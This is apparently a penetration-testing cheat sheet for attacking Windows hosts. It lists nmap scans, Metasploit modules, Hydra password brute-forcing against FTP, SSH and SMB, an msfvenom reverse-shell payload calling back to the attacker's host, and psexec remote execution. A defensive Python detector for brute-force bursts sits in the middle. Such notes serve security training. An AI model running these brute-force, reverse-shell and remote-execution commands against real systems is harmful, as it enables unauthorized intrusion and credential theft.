🪟 Windows Exploitation

Port Scanning & Enumeration - Windows

  • Conduct a common port scan

nmap -sV <ip>
  • Perform a port scan on ports 1 to 10000 and save the output in Nmap XML format (the format db_import expects) to "nmap_10k".

nmap -T4 -PA -sC -sV -p 1-10000 <ip> -oX nmap_10k
  • Perform a port scan on all 65535 TCP ports and save the XML output to "nmap_all".

nmap -T4 -PA -sC -sV -p- <ip> -oX nmap_all
  • Conduct a UDP port scan with version detection (a full-range UDP scan is slow; narrow -p when time matters).

nmap -sU -sV -p- <ip>
  • msfconsole commands:

    • workspace -a <workspace_name> – Create a new workspace.

    • workspace – Display the current workspace.

    • db_import <nmap_scan_file_path> – Import an Nmap scan report into the database.

    • hosts – List discovered hosts in the current workspace.

    • services – List services associated with discovered hosts.

    • auxiliary/scanner/smb/smb_version – Use Metasploit to scan for SMB version information.

Targeting Microsoft IIS FTP

nmap -sV -p 21 --script=ftp-anon <target-IP>
  • Conduct an Nmap scan on port 21 with the "ftp-anon" script to check for anonymous FTP access.

hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt <ip> ftp
  • Use Hydra to perform a brute-force attack using a list of Unix usernames and passwords against the FTP service on the specified target (Hydra needs the service name; without it the command errors out).

msfvenom -p windows/shell/reverse_tcp LHOST=<our_IP> LPORT=<our_Port> -f asp > shell.aspx
  • Generate a reverse shell payload in ASP format using msfvenom, with the specified listener IP and port, and save it to a file named "shell.aspx". The -f format and the file extension have to match what the target IIS instance executes (msfvenom also offers -f aspx for ASP.NET).

Targeting OpenSSH

hydra -l vagrant -P /usr/share/wordlists/metasploit/unix_passwords.txt <ip> ssh
  • Use Hydra to perform a brute-force attack with the username "vagrant" and a list of Unix passwords against the SSH service on the specified target IP.

auxiliary/scanner/ssh/ssh_login
  • Use this Metasploit auxiliary module to scan for SSH servers and attempt to log in using provided credentials or default ones.

Targeting MySQL Database Server

nmap -sV -sC -p 3306,8585 <ip>
  • Conduct an Nmap scan with version detection and default scripts on ports 3306 and 8585 of the specified IP.

auxiliary/scanner/mysql/mysql_login
  • Use this Metasploit auxiliary module to scan for MySQL servers and attempt to log in using provided credentials or default ones.

mysql -u <user> -p<pass> -h <ip>
  • Use the MySQL client to connect to the specified IP using the given username and password. Note that there is no space between -p and the password; with a space, the client prompts for the password and treats <pass> as a database name.

Targeting SMB

hydra -l administrator -P /usr/share/wordlists/metasploit/unix_passwords.txt <Ip> smb
  • Use Hydra to perform a brute-force attack with the username "administrator" and a list of Unix passwords against the SMB service on the specified IP.
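The Hydra runs in this section and in the FTP and OpenSSH sections above all leave the same footprint: a burst of failed logins from one source, either against one account or sprayed across many. The detector below is an added example (not part of the original notes) that finds that footprint in authentication logs; the log lines are constructed in a simplified "timestamp service source user result" form, not real service output.

```python
"""Flag password-guessing bursts of the kind Hydra against FTP, SSH or SMB
produces.  Added example, not part of the original notes; SAMPLE_LOG is a
constructed, simplified log, not output of any real service."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: 10.0.0.9 hammers one ssh account and then gets in,
# 10.0.0.7 sprays smb across many accounts, 10.0.0.3 is a user with one typo.
SAMPLE_LOG = """\
2024-03-01T10:00:01 ssh 10.0.0.9 vagrant FAIL
2024-03-01T10:00:02 ssh 10.0.0.9 vagrant FAIL
2024-03-01T10:00:02 ssh 10.0.0.9 vagrant FAIL
2024-03-01T10:00:03 ssh 10.0.0.9 vagrant FAIL
2024-03-01T10:00:03 ssh 10.0.0.9 vagrant FAIL
2024-03-01T10:00:04 ssh 10.0.0.9 vagrant FAIL
2024-03-01T10:00:05 ssh 10.0.0.9 vagrant OK
2024-03-01T10:00:10 smb 10.0.0.7 alice FAIL
2024-03-01T10:00:10 smb 10.0.0.7 bob FAIL
2024-03-01T10:00:11 smb 10.0.0.7 carol FAIL
2024-03-01T10:00:11 smb 10.0.0.7 dave FAIL
2024-03-01T10:00:12 smb 10.0.0.7 erin FAIL
2024-03-01T10:15:00 ssh 10.0.0.3 alice FAIL
2024-03-01T10:15:20 ssh 10.0.0.3 alice OK
"""


def parse_log(text):
    """Turn the simplified log into (timestamp, service, src, user, ok) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, service, src, user, result = line.split()
        events.append((datetime.fromisoformat(ts), service, src, user, result == "OK"))
    return events


def detect_bruteforce(events, window=timedelta(seconds=60), threshold=5):
    """Alert per (src, service) when at least `threshold` failures fall inside
    a sliding time window.  Each alert records the total failure count, how
    many distinct accounts were tried, and whether a successful login from the
    same source followed the burst (the case that needs immediate follow-up)."""
    by_key = defaultdict(list)
    for ts, service, src, user, ok in events:
        by_key[(src, service)].append((ts, user, ok))
    alerts = {}
    for key, evs in by_key.items():
        evs.sort()
        fails = [(ts, user) for ts, user, ok in evs if not ok]
        start = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                burst_end = fails[end][0]
                users = {u for _, u in fails[start:end + 1]}
                success_after = any(ok and ts >= burst_end for ts, _, ok in evs)
                alerts[key] = {"failures": len(fails), "users": len(users),
                               "success_after": success_after}
                break
    return alerts


def classify(alert):
    """Many accounts from one source is spraying; one account is plain guessing."""
    return "password-spray" if alert["users"] > 1 else "single-account-bruteforce"


if __name__ == "__main__":
    for (src, service), alert in detect_bruteforce(parse_log(SAMPLE_LOG)).items():
        print(src, service, classify(alert), alert)
```

The window and threshold are tuning knobs: a wordlist run such as the ones above produces several failures per second, so a 60-second window with a threshold of 5 catches it while leaving the single mistyped password from 10.0.0.3 alone. The success-after-burst flag is the one to page on, since it marks the guess that landed.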

smbclient -L <ip> -U <user-Name>
  • Use smbclient to list shares on the target IP, providing a username.

smbmap -u <user_name> -p <pass> -H <ip>
  • Utilize smbmap to enumerate shares on the target IP, providing a username and password.

enum4linux -u <user-name> -p <password> -U <ip>
  • Run enum4linux to gather information from the target IP using specified credentials.

auxiliary/scanner/smb/smb_enumusers
  • Use this Metasploit auxiliary module to enumerate user accounts on an SMB server.

python3 psexec.py Administrator@<ip>
  • Run Impacket's psexec.py to attempt remote command execution as the Administrator user on the specified IP (it prompts for the password).

  • Always review the discovered services and their versions before deciding on the next step.

Hacker's Mantra: The hacker didn't succeed through sophistication. Rather he poked at obvious places, trying to enter through unlocked doors. Persistence, not wizardry, let him through. - Clifford Stoll